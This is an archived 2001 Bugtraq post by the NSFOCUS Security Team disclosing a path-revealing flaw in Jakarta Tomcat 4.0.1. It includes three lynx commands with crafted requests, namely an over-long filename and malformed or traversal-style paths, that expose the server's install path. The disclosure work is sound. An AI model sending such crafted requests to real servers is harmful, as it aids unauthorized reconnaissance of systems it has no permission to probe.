[23230] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Hi

daemon@ATHENA.MIT.EDU (analysist)
Fri Nov 23 17:38:01 2001

Message-Id: <200111220923.fAM9Mxu28837@www.nsfocus.com>
Date: Thu, 22 Nov 2001 17:32:20 +0800
From: analysist <analysist@nsfocus.com>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain;
      charset="GB2312"
Content-Transfer-Encoding: 8bit

Hello,

It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submiting an unusually long request(more than 222 bites) or a special crafted request, we can
get the web server's install path.

How to produce it
----------------------
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp

Tested version 
-----------------------   
Jakarta Tomcat v4.0.1
    Microsoft Windows 2000

I sent this information to the vendor a week ago, but i have not received any reply!:( 

Best Regards

analysist@nsfocus.com 
NSFOCUS Security Team <http://www.nsfocus.com>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[23230] in bugtraq

Hi

daemon@ATHENA.MIT.EDU (analysist)Fri Nov 23 17:38:01 2001

daemon@ATHENA.MIT.EDU (analysist)
Fri Nov 23 17:38:01 2001